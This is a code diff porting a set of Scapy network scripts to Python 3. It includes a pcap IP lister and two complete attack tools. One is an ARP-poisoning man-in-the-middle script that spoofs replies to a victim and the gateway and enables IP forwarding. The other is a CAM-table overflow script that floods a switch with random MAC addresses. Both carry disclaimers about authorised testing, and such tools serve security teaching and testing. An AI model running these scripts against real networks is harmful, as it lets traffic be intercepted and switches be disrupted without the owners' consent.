Updating for python3

3way.py

@@ -17,4 +17,4 @@
 # SEND our ACK-GET request
 reply,error=sr(ACK)
 # Print the reply
-print reply.show()
+print(reply.show())

all_devices_pcap.py

@@ -1,25 +1,79 @@
-from __future__ import print_function
-from sys import argv
+#!/usr/bin/env python3
+"""
+all_devices.py
+
+This script analyzes a pcap (packet capture) file to extract and print a list of unique IP addresses
+present in the captured network traffic. It uses the Scapy library to read and process the packets.
+Both source and destination IP addresses are extracted and printed as soon as they are found.
+
+Usage:
+    python3 all_devices.py path_to_pcap
+
+Dependencies:
+    - Python 3.x
+    - Scapy (install via: pip install scapy)
+
+Functionality:
+    - Reads a pcap file using Scapy's rdpcap function.
+    - Iterates over each packet and checks for the presence of an IP layer.
+    - Extracts and prints unique source and destination IP addresses.
+    - Displays a final list of all unique IP addresses found.
+"""
+
+import sys
 from scapy.all import rdpcap, IP
 
 def help_text():
-    print("Usage: python all_devices.py path_to_pcap")
-    sys.exit()
-
-def extract_machine_names(pcap):
-    machines = []
-    packets = rdpcap(pcap)
-    for i in range(len(packets)):
-             if packets[i][IP].src not in machines:
-                 machines.append(packets[i][IP].src)
-                 print(len(machines), packets[i][IP].src)
-             elif packets[i][IP].dst not in machines:
-                 machines.append(packets[i][IP].dst)
-                 print(len(machines), packets[i][IP].dst)
+    """
+    Displays the usage instructions for the script and exits the program.
+
+    This function is called when the required pcap file path argument is missing.
+    """
+    print("Usage: python3 all_devices.py path_to_pcap")
+    sys.exit(1)
+
+def extract_machine_names(pcap_file):
+    """
+    Extracts unique IP addresses from the provided pcap file.
+
+    Parameters:
+        pcap_file (str): The file path to the pcap file to analyze.
+
+    Returns:
+        list: A list of unique IP addresses found in the pcap file.
+
+    Process:
+        1. Reads all packets from the given pcap file using rdpcap.
+        2. Iterates over each packet and checks if the packet contains an IP layer.
+        3. For packets with an IP layer:
+           - Checks the source IP address; if it is not already in the list, adds it and prints it.
+           - Checks the destination IP address; if it is not already in the list, adds it and prints it.
+    """
+    machines = []  # List to store unique IP addresses
+    packets = rdpcap(pcap_file)  # Read packets from the provided pcap file
+
+    # Iterate over each packet in the capture file
+    for packet in packets:
+        # Ensure the packet contains an IP layer to prevent processing errors
+        if IP in packet:
+            # Process the source IP address if it hasn't been encountered before
+            if packet[IP].src not in machines:
+                machines.append(packet[IP].src)
+                print(len(machines), packet[IP].src)
+            # Process the destination IP address if it hasn't been encountered before
+            if packet[IP].dst not in machines:
+                machines.append(packet[IP].dst)
+                print(len(machines), packet[IP].dst)
+
     return machines
 
 if __name__ == '__main__':
-    pcap = argv[1]
-    if len(argv) < 2:
-        help_text()
-    print("\nList of all the machines in pcap =>", extract_machine_names(pcap),end="\n\n")
+    # Verify that the user has provided the pcap file path as a command-line argument
+    if len(sys.argv) < 2:
+        help_text()  # Show help text and exit if no file path is provided
+
+    # The first argument is the path to the pcap file
+    pcap_file = sys.argv[1]
+
+    # Extract and print the unique IP addresses from the provided pcap file
+    print("\nList of all the machines in pcap =>", extract_machine_names(pcap_file), "\n")

arp_mitm.py

@@ -1,65 +1,133 @@
+#!/usr/bin/env python3
+"""
+ARP Poisoning MITM Script
+
+This script performs ARP poisoning to conduct a Man-in-the-Middle (MITM) attack on a local network.
+It sends spoofed ARP responses to both the victim and the gateway (router) so that their traffic is
+routed through the attacker's machine.
+
+IMPORTANT:
+    - This script requires root privileges to run.
+    - It modifies IP forwarding settings on the system.
+    - Use responsibly and only on networks you own or have explicit permission to test.
+
+Usage:
+    python3 <script_name.py>
+
+The script will prompt for:
+    - The network interface to use (e.g., eth0)
+    - Victim's IP address
+    - Gateway (router) IP address
+"""
+
 from scapy.all import *
 import sys
 import os
 import time
 
+# Request user input for the interface, victim IP, and gateway IP.
+# In Python 3, use 'input()' instead of 'raw_input()'.
 try:
-	interface = raw_input("[*] Enter Desired Interface: ")
-	victimIP = raw_input("[*] Enter Victim IP: ")
-	gateIP = raw_input("[*] Enter Router IP: ")
+    interface = input("[*] Enter Desired Interface: ")
+    victimIP = input("[*] Enter Victim IP: ")
+    gateIP = input("[*] Enter Router IP: ")
 except KeyboardInterrupt:
-	print "\n[*] User Requested Shutdown"
-	print "[*] Exiting..."
-	sys.exit(1)
+    # Handle interruption (e.g., user pressing Ctrl+C) gracefully.
+    print("\n[*] User Requested Shutdown")
+    print("[*] Exiting...")
+    sys.exit(1)
 
-print "\n[*] Enabling IP Forwarding...\n"
+# Enable IP forwarding to allow the attacker's machine to forward traffic.
+print("\n[*] Enabling IP Forwarding...\n")
 os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
 
 def get_mac(IP):
-	conf.verb = 0
-	ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1)
-	for snd,rcv in ans:
-		return rcv.sprintf(r"%Ether.src%")
+    """
+    Retrieves the MAC address for a given IP address via an ARP request.
+
+    Parameters:
+        IP (str): The target IP address for which the MAC address is requested.
+
+    Returns:
+        str: The MAC address of the target IP if found.
+    """
+    # Disable verbose output from scapy.
+    conf.verb = 0
+    # Send an ARP request to the broadcast MAC address for the specified IP.
+    ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=IP),
+                      timeout=2, iface=interface, inter=0.1)
+    for snd, rcv in ans:
+        # Return the source MAC address from the received ARP reply.
+        return rcv.sprintf(r"%Ether.src%")
 
 def reARP():
-
-	print "\n[*] Restoring Targets..."
-	victimMAC = get_mac(victimIP)
-	gateMAC = get_mac(gateIP)
-	send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7)
-	send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7)
-	print "[*] Disabling IP Forwarding..."
-	os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
-	print "[*] Shutting Down..."
-	sys.exit(1)
+    """
+    Restores the original ARP configuration on the network.
+
+    This function is called when the attack is interrupted. It sends ARP packets to both
+    the victim and the gateway to restore their correct MAC-IP mappings, disables IP forwarding,
+    and exits the script.
+    """
+    print("\n[*] Restoring Targets...")
+    # Retrieve the actual MAC addresses for the victim and the gateway.
+    victimMAC = get_mac(victimIP)
+    gateMAC = get_mac(gateIP)
+    # Send ARP responses to restore the correct MAC addresses on both targets.
+    send(ARP(op=2, pdst=gateIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=7)
+    send(ARP(op=2, pdst=victimIP, psrc=gateIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateMAC), count=7)
+    print("[*] Disabling IP Forwarding...")
+    os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
+    print("[*] Shutting Down...")
+    sys.exit(1)
 
 def trick(gm, vm):
-	send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm))
-	send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm))
+    """
+    Performs the ARP poisoning by sending spoofed ARP responses to both the victim and the gateway.
+
+    Parameters:
+        gm (str): Gateway's MAC address.
+        vm (str): Victim's MAC address.
+    """
+    # Spoof the victim: tell the victim that the gateway IP is at the attacker's MAC.
+    send(ARP(op=2, pdst=victimIP, psrc=gateIP, hwdst=vm))
+    # Spoof the gateway: tell the gateway that the victim IP is at the attacker's MAC.
+    send(ARP(op=2, pdst=gateIP, psrc=victimIP, hwdst=gm))
 
 def mitm():
-	try:
-		victimMAC = get_mac(victimIP)
-	except Exception:
-		os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")		
-		print "[!] Couldn't Find Victim MAC Address"
-		print "[!] Exiting..."
-		sys.exit(1)
-	try:
-		gateMAC = get_mac(gateIP)
-	except Exception:
-		os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")		
-		print "[!] Couldn't Find Gateway MAC Address"
-		print "[!] Exiting..."
-		sys.exit(1)
-	print "[*] Poisoning Targets..."	
-	while 1:
-		try:
-			trick(gateMAC, victimMAC)
-			time.sleep(1.5)
-		except KeyboardInterrupt:
-			reARP()
-			break
+    """
+    Main function to perform the ARP poisoning MITM attack.
+
+    It first attempts to obtain the MAC addresses of both the victim and the gateway. If it fails to
+    retrieve either, it disables IP forwarding and exits. Once both MAC addresses are acquired, it enters
+    an infinite loop to continuously send spoofed ARP responses. If interrupted, it calls reARP() to restore
+    the network.
+    """
+    try:
+        victimMAC = get_mac(victimIP)
+    except Exception:
+        os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
+        print("[!] Couldn't Find Victim MAC Address")
+        print("[!] Exiting...")
+        sys.exit(1)
+
+    try:
+        gateMAC = get_mac(gateIP)
+    except Exception:
+        os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
+        print("[!] Couldn't Find Gateway MAC Address")
+        print("[!] Exiting...")
+        sys.exit(1)
+
+    print("[*] Poisoning Targets...")
+    # Continuously send spoofed ARP packets every 1.5 seconds.
+    while True:
+        try:
+            trick(gateMAC, victimMAC)
+            time.sleep(1.5)
+        except KeyboardInterrupt:
+            # On interruption, restore the network configuration.
+            reARP()
+            break
 
 if __name__ == '__main__':
     mitm()

cam_overflow.py

@@ -1,34 +1,63 @@
+#!/usr/bin/env python3
+"""
+CAM Overflow Attack Script
 
-#-------------------------------------------------------------------------------#
-#     A script to perform CAM overflow attack on Layer 2 switches               #
-#                   Bharath(github.com/yamakira)                                #
-#                                                                               #
-#     CAM Table Overflow is all about flooding switches CAM table               #
-#     with a lot of fake MAC addresses to drive the switch into HUB mode.       #
-#-------------------------------------------------------------------------------#
+This script performs a CAM table overflow attack on Layer 2 switches. It works by flooding the
+switch's CAM table with a large number of packets containing fake MAC addresses. When the CAM table
+overflows, the switch is forced to operate in hub mode, which can be useful for testing network
+resilience or security measures.
 
-#!/usr/bin/env python
-from scapy.all import Ether, IP, TCP, RandIP, RandMAC, sendp
+DISCLAIMER:
+    This script is for educational purposes only. Unauthorized use on networks you do not own or
+    have explicit permission to test is illegal and unethical.
 
+Author: Bharath (github.com/yamakira)
+"""
 
-#destMAC = "FF:FF:FF:FF:FF:FF"
+from scapy.all import Ether, IP, RandIP, RandMAC, sendp
 
-'''Filling packet_list with ten thousand random Ethernet packets
-   CAM overflow attacks need to be super fast.
-   For that reason it's better to create a packet list before hand.
-'''
 def generate_packets():
-    packet_list = []		#initializing packet_list to hold all the packets
-    for i in xrange(1,10000):
-        packet  = Ether(src = RandMAC(),dst= RandMAC())/IP(src=RandIP(),dst=RandIP())
+    """
+    Generate a list of random Ethernet/IP packets for a CAM table overflow attack.
+
+    The function creates 10,000 packets. Each packet includes:
+        - An Ethernet layer with random source and destination MAC addresses.
+        - An IP layer with random source and destination IP addresses.
+
+    These packets are intended to rapidly flood the target switch's CAM table.
+
+    Returns:
+        list: A list containing the generated packets.
+    """
+    packet_list = []  # Initialize a list to hold all the packets.
+
+    # Create 10,000 packets using random MAC and IP addresses.
+    for i in range(1, 10000):
+        # Construct an Ethernet/IP packet with random addresses.
+        packet = Ether(src=RandMAC(), dst=RandMAC()) / IP(src=RandIP(), dst=RandIP())
         packet_list.append(packet)
+
+    return packet_list
 
 def cam_overflow(packet_list):
-# sendpfast(packet,iface='tap0', mbps)
+    """
+    Execute the CAM table overflow attack by sending the generated packets.
+
+    This function sends the entire packet list on a specified network interface (here 'tap0').
+    This flooding of packets aims to overwhelm the switch's CAM table, causing it to fail and
+    operate as a hub instead.
+
+    Parameters:
+        packet_list (list): The list of pre-generated packets to be sent.
+    """
+    # For faster packet sending, consider using sendpfast with an appropriate rate:
+    # sendpfast(packet_list, iface='tap0', mbps=<desired_mbps>)
+    # Here we use sendp to send the packets on interface 'tap0'.
     sendp(packet_list, iface='tap0')
 
-
 if __name__ == '__main__':
+    # Generate the list of packets to be used for the attack.
     packet_list = generate_packets()
+
+    # Execute the CAM table overflow attack by sending the generated packets.
     cam_overflow(packet_list)
-